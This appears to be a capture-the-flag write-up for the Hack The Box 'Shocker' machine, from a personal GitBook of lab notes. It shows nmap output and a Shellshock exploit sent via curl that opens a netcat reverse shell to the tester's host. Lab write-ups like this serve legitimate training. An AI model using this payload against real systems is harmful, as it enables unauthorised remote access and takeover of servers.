✒️
Report
  • Introduction
  • MCC 2022
    • ThisIsSoEasy1
    • Hermoso
  • Vulnhub
    • Kioptrix
      • Level 1.1
      • Level 1.2
      • Level 1.3
      • Level 1.4
    • Symfonos
      • Symfonos 1
      • Symfonos 2
      • Symfonos 3
      • Symfonos 4
    • DC
      • DC6
      • DC9
    • Sar1
    • Toppo 1
    • Prime 1
    • Bob 1.0.1
    • Escalate Linux < NOT FINISH >
    • Djinn 1
    • Golden Eye 1
    • Hackme1
    • Stapler 1
    • DerpNStink
    • Lin Security
    • W34KN3SS
  • Symfonos 5 <NOT WORKING>
  • Hackthebox
    • Delivery (Easy)
    • Spectra (Easy)
    • Script Kiddie (Easy)
    • Armageddon (Easy)
    • Love (Easy)
    • Knife (Easy)
    • Traverxec (Easy)
    • Bastion (Easy)
    • Heist (Easy)
    • Shocker (Easy)
    • Active (Easy)
    • The Notebook (Medium)
    • Paper (Easy)
    • Jerry (Easy)
    • Networked (Easy)
    • Swagshop (Easy) - Not Working
    • Lame (Easy)
Powered by GitBook
On this page
  • Enumeration
  • Nmap
  • Dirbuster
  • Reverse Shell
  • Privilege Escalation

Was this helpful?

  1. Hackthebox

Shocker (Easy)

Enumeration

Nmap

nmap -sC -sV -oA nmap/10.10.10.56 10.10.10.56
Nmap scan report for 10.10.10.56
Host is up (0.11s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jul  2 12:30:09 2021 -- 1 IP address (1 host up) scanned in 22.73 seconds

Port 80 is open, let's have a look

We can't find anything on this page, so lets directory brute force it

Dirbuster

We can see there is a file called user.sh

We can download it.

Reverse Shell

curl -A "() { :; }; /bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.16.23 4444 >/tmp/f'" http://10.10.10.56/cgi-bin/user.sh

Fire up our listener, and run this command, then we will get a shell.

Privilege Escalation

Rooted!

PreviousHeist (Easy)NextActive (Easy)

Last updated 3 years ago

Was this helpful?

After some research, we can know that this vulnerability is called shell shock. Explanation can be found at .

We can navigate to to exploit it.

pentesterlab
GTFObin